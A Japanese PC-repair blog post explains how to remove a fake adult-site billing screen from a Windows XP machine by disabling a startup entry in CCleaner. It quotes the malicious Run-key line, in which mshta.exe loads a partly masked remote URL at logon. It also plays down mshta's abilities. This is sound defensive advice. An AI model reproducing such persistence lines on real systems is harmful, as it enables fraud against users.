こんばんわ。

ブログMiMiです。

ウインドウズXPのパソコンをご利用のお客様から、最近パソコンを起動するとアダルトサイトの入会及び支払請求の画面が表示されて困っているといったご相談を受けました。

そのアダルトサイトの入会画面は、何度消しても表示されるとの事でパソコンの使用自体に支障が出ているとの事です。

ウインドウズのリモート機能でログインして、遠隔でパソコンを確認しようと思ったのですが、直接パソコンを見て欲しいとの事でしたので、パソコン一式を宅配していただきました。

パソコンがヤマト運輸で届きましたので、早速確認してみましたが、本当にウインドウズが起動してログインをしたら、如何わしい画像が表示されています。

これは、知らない人が見たら大変ですというくらいの酷い画面です。

正直言って、私はこの画面を見ると笑いが止まらないのですが、あまり詳しくない人が見たら、びっくりするでしょう。

こういった、パソコンの画面にアダルトサイトの請求が勝手に表示されて困っているといったご相談は、結構あります。

その殆どが、年配の男性の方からになります。

請求画面には支払期限が過ぎていますので、至急お電話ください等と表示されていますが、絶対に電話などはしないようにしてください。

具体的に何が表示されていたかというと以下の通りです。

「有料アダルトサイトへのご入会ありがとうございます。」

お客様ID番号を発行しました、ご利用料金がはっせいしております。期間限定キャンペーン実施中！！等と書かれています。

あとは、風俗女性のような女性が、下着で写っている写真も表示されています。

極めつけは、「お支払期限を過ぎています」の警告表示ですね。

ちなみに、電話番号は03-5428-5490と書かれていました。

未だに、こんなアダルトサイトの架空請求に騙される人が居るとは思えないのですが、やはりある程度は騙される人が居るから、架空請求が行われている訳です。

このような画面が、ウインドウズXPの起動と同時に表示されてしまい、何度画面を消しても、同じアダルトサイトの入会及び支払い画面が表示されると、パソコンそのものの電源を入れたくなくなるのは無理もありません。

こういったアダルトサイトの請求画面が勝手にパソコンに表示される場合は、以下の手順で解決を行ないます。

レジストリと呼ばれる、ウインドウズXPのOSが参照している部分を書き換えたりしますので、簡単かつ安全にそれが行なえるツールをダウンロードしてインストールして下さい。

「CCleaner」で検索すれば、沢山表示されますので、このソフトをインストールします。

インストールの最中で、グーグルのクロームブラウザをインストールしますといった表示にチェックボックスが入っていますが、このチェックは外してください。

「CCleaner」は完全にフリーソフトです。有料バージョンもありますが、無償バージョンで十分ですので、無償バージョンを選択します。

なぜ、インストールの途中で、グーグルのブラウザをインストールするような仕様になっているのか分かりますか？

それは、フリーで世界規模で沢山の人に、このソフトをダウンロードしてもらえる事になります。これは、相当な宣伝場所になっているということです。

グーグルがこれを見逃すはずがありません。このフリーソフトをインストールする際にグーグルのブラウザもインストールすると、グーグルからソフトの開発者にお金がもらえる仕組みになっています。

クロームが必要ない方は、必ずチェックは外してインストールしましょう。

CCleanerを起動したら、左に4つのボタンがありますので、上から三番目のツールをマウスでクリックします。

そして、その右にあるスタートアップを選択すると、ウインドウズが起動した際に自動で実行されるプログラムが一覧表示されています。

この中で、注目する項目は「mshta.exe 」と表示のあるプログラムです。

恐らくは、2個か3個くらいこの一覧の中に表示されているはずですので、上から順番に見ていきます。

以下のような表記の行があるはずですので、よーく確認します。

「有効    HKCU:Run    SystemBootfxgI1bD3tTfWKQmv4KDCvVMbIEZJA9BN    Microsoft Corporation    mshta.exe http://zm＊＊.zhe＊＊.net/reg＊＊.php?cccid=******&log=******」

※******は固有のハッシュコードと呼ばれる、固体識別番号になっていますので、この部分は各自で異なります。

※URLの部分は一部伏字にしています。

これが、ウインドウズXPが起動する際に、自動でアダルトサイトの入会案内を表示しているプログラムです。

大変如何わしいウイルスのように思えるかもしれませんが、実はウイルスではありません。マイクロソフトが標準で用意しているプログラムです。

アダルトサイトの架空請求業者はこのプログラムを悪用している訳です。

ですから、ウイルスを発見するソフトウェアで検索しても、ウイルスとして認識される事はまずありません。特にパソコンを乗っ取る行為や、破壊するような行為をする訳ではないからです。

アダルトサイトの架空請求を行なっている会社のサーバに接続して、その中のHTMLを単純にウインドウズXPの画面で表示しているだけです。

※HTMLとはホームページのことと思ってください。

たった、これだけの仕組みです。

アダルトサイトの入会案内に表示されているお客様ID番号、ご登録日、お支払い期限等は、このアダルトサイトの架空請求業者のDBサーバに記録されており、その番号やメッセージを動的にHTMLとして表示しているだけになります。

ただ、HTMLの仕様になりますが、接続しているIPやブラウザの固有情報などのリファラーは、いやおう無くアダルトサイトの架空請求業者に渡っていますが、パソコンの内部情報や個人情報が、アダルトサイトの架空請求業者に渡っている訳ではありませんので、こちらはご安心ください。

ウインドウズXPに悪さをしているプログラムが分ったら、次は削除を行ないます。

「CCleaner」で「mshta.exe」が表示されている行を選択して、右に3つあるボタンの真ん中の無効をクリックします。

すると、以下のように表示が変わります。

「無効       HKCU:Run    SystemBootfxgI1bD3tTfWKQmv4KDCvVMbIEZJA9BN    Microsoft Corporation    mshta.exe http://zm＊＊.zhe＊＊.net/reg＊＊.php?cccid=******&log=******」

「mshta.exe」が表示されている行、全てを無効にしてください。

これで、今後アダルトサイトの入会及び請求案内が、パソコンの画面に表示される事はなくなります。

別に、無効でなくて、エントリの削除を押してもらっても構いませんが、ひとまずは無効にしておいて、再起動を行い、パソコンの動作が問題なければ、再度、エントリの削除を押して、「mshta.exe」が表示されている行を完全削除するのがお勧めです。

他にも、スケジュールされたタスクなども見てみるとよいでしょう。今回のパソコンにはここには何も記載されていませんでした。

お客様のウインドウズXPを再起動して、全く問題がなくなったのを確認して、作業終了になります。

「mshta.exe」を悪用した、レベルは低いといってもかなり悪質な犯罪ですので、その後、警察に相談するかどうかはお客様のご判断になります。

こんなふざけた、詐欺師が行なっているフロント企業などを経営している連中が、六本木ヒルズレジデンスC等に結構居住しているわけですから、何か世の中間違っていると思います。

架空請求は儲かりますが、当然犯罪ですので、警察はもう少し真剣になって、犯人の検挙を行なってみてはいかがでしょうか？

もし、こういったアダルトサイトの架空請求業者に、裁判で訴えるといった通知や連絡が着たらどうしたらよいのですか？とご相談されますが、その場合は無視してください。あまりにしつこいようでしたら、警察に相談に言ってください。

ただし、ごくまれに、本当の裁判所経由で、訴訟の通知が来る場合がありますので、その際には絶対に無視はしていけません。無視をすると相手の主張が１００％通ってしまいます。

裁判所経由で詐欺師から請求に関する訴状が届いた場合は、必要事項を書類に書き込み、裁判所の指示に従って行動してください。分らない場合は弁護士等に相談に行くとよいでしょう。当然、警察にも相談に行く必要があります。

よろしくお願いいたします。